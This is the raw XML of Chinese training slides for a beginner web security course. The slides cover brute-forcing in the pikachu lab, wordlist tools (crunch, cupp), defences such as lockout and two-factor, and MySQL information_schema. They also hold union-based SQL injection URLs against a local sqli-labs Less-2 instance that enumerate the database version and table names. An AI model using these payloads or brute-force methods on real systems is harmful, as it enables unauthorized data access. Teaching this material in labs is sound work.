          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033780" y="3592195"/>
            <a:ext cx="8089900" cy="2667635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5959475" y="589915"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pikachu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>靶场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</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45895" y="584200"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="590550" y="1330325"/>
            <a:ext cx="11010900" cy="41973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7470" y="634365"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>kali crunch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生成</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148955" y="187325"/>
            <a:ext cx="3765550" cy="5346065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="854075" y="1301750"/>
            <a:ext cx="6959600" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="854075" y="2616835"/>
            <a:ext cx="6934200" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555625" y="6129655"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其他工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cupp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ccupp</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7460" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>暴力破解防御</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267460" y="1307465"/>
            <a:ext cx="4064000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>限制错误次数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>验证码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二因素认证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248410" y="3060700"/>
            <a:ext cx="4064000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不足：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>锁定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证码识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>二因素认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</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04290" y="528955"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>练习时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982345" y="1406525"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-weak_auth</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目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础第一次培训</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全岗位介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全实战途径</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zh-CN" dirty="0"/>
              <a:t>1.3.SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</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1590" y="436245"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174115" y="1239520"/>
            <a:ext cx="7988935" cy="1751965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入即是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在事先定义好的查询语句的结尾上添加额外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入产生的根本原因是用户输入的参数改变了原本的查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>逻辑。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9309735" y="1239520"/>
            <a:ext cx="2562225" cy="1833880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1503045" y="3705860"/>
            <a:ext cx="8604250" cy="28003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45895" y="454025"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>系统库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647440" y="172085"/>
            <a:ext cx="7480300" cy="3409950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211580" y="4009390"/>
            <a:ext cx="8874125" cy="2614930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SCHEMATA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表：提供了当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实例中所有数据库信息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> show databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果取之此表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表：提供了关于数据中表的信息。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>COLUMNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表：提供了表的列信息，详细描述了某张表的所有列以及每个列的信息。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>column_name</a:t>
            </a:r>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59890" y="332740"/>
            <a:ext cx="8903335" cy="6214110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140460" y="332740"/>
            <a:ext cx="8934450" cy="6235700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="454025" y="332740"/>
            <a:ext cx="8934450" cy="6235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2060" y="504190"/>
            <a:ext cx="8645525" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入初见（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>sqli-labs less2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>为例）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1678940"/>
            <a:ext cx="11172825" cy="3379470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=1 and 1=2 %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=1 order by 4 %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,2,3 %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,2,concat(0x7e,version()) %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,2,concat(0x7e,database()) %23</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2060" y="504190"/>
            <a:ext cx="8355330" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入初见（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>sqli-labs less2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>为例）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1678940"/>
            <a:ext cx="11172825" cy="3379470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
